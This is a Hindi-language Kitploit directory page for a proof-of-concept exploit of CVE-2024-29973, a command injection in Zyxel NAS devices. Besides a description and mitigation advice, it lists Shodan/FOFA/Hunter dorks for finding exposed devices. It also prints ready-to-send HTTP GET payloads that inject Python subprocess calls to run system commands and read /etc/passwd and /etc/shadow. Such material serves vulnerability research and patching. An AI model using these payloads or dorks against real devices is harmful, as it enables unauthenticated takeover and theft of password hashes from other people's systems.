Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-29973 — Zyxel NAS डिवाइसों में कमांड इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। तैयार किए गए HTTP अनुरोधों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है, जिससे सिस्टम अधिग्रहण और डेटा निष्कर्षण संभव होता है। | Kitploit
उपकरण/GitHubGitHub/kernel364/cve-2024-29973
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करना
GitHubkernel364/cve-2024-29973

CVE-2024-29973

Zyxel NAS डिवाइसों में कमांड इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। तैयार किए गए HTTP अनुरोधों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है, जिससे सिस्टम अधिग्रहण और डेटा निष्कर्षण संभव होता है।

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-29973 - रिमोट कमांड इंजेक्शन भेद्यता

विवरण

CVE-2024-29973 कुछ Zyxel नेटवर्किंग उपकरणों में पाई जाने वाली एक गंभीर भेद्यता है। यह भेद्यता एक अनधिकृत हमलावर को फर्मवेयर में अनुचित इनपुट सत्यापन तंत्रों का फायदा उठाकर लक्षित डिवाइस पर मनमाने कमांड निष्पादित करने की अनुमति देती है। हमलावर डिवाइस पर विशेष रूप से तैयार किए गए HTTP अनुरोध भेज सकते हैं, सिस्टम-स्तरीय कमांड इंजेक्ट कर सकते हैं और संभावित रूप से डिवाइस पर पूर्ण नियंत्रण प्राप्त कर सकते हैं।

Dorks

Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"

यह कैसे काम करता है

कमांड इंजेक्शन: यह भेद्यता डिवाइस के वेब इंटरफेस में से एक में अपर्याप्त इनपुट सैनिटाइज़ेशन के कारण उत्पन्न होती है। यह दोष हमलावरों को HTTP अनुरोधों के मापदंडों के भीतर ऑपरेटिंग सिस्टम कमांड जोड़ने की अनुमति देता है।

एक्सप्लॉइट उदाहरण: हमलावर नीचे दिए गए उदाहरण जैसे HTTP GET अनुरोध के माध्यम से कमांड इंजेक्ट करके मनमाना कोड निष्पादित कर सकते हैं:

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1

प्रभाव: सफल शोषण के परिणामस्वरूप सिस्टम कमांड निष्पादित करने की क्षमता प्राप्त होती है, जिससे संभावित रूप से डिवाइस पर रिमोट नियंत्रण, डेटा रिसाव, या नेटवर्क से आगे समझौता हो सकता है।

रोकथाम

इस भेद्यता से जुड़े जोखिमों को कम करने के लिए, इन चरणों का पालन करें:

फर्मवेयर अपडेट: सुनिश्चित करें कि सभी Zyxel डिवाइस नवीनतम फर्मवेयर संस्करण में अपडेट किए गए हैं। Zyxel ने इस भेद्यता को संबोधित करने वाले पैच जारी किए हैं। नियमित रूप से अपडेट की जाँच करें और उन्हें तुरंत लागू करें।

नेटवर्क विभाजन: कमजोर डिवाइसों को महत्वपूर्ण नेटवर्क बुनियादी ढांचे से अलग करें। केवल आवश्यक सेवाओं को उजागर करें और सुनिश्चित करें कि प्रशासनिक इंटरफेस सार्वजनिक रूप से सुलभ नहीं हैं।

फ़ायरवॉल कॉन्फ़िगरेशन: आने वाले और बाहर जाने वाले ट्रैफ़िक को केवल आवश्यक सेवाओं तक सीमित करें। Zyxel डिवाइसों तक अनावश्यक HTTP पहुँच को ब्लॉक करें।

संदिग्ध गतिविधि की निगरानी करें: लॉगिंग और मॉनिटरिंग टूल लागू करें जो असामान्य व्यवहार, जैसे बार-बार लॉगिन प्रयास या असामान्य ट्रैफ़िक पैटर्न का पता लगा सकें और अलर्ट कर सकें।

संदर्भ राष्ट्रीय भेद्यता डेटाबेस - CVE-2024-29973 Zyxel सुरक्षा सलाह

छवियाँ

alt text

POC

/etc/passwd

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1

/etc/shadow

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1

ifconfig

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1

hostname

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1

ip

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1

uname -a

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1

/etc/group

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1
टूल डाउनलोड करें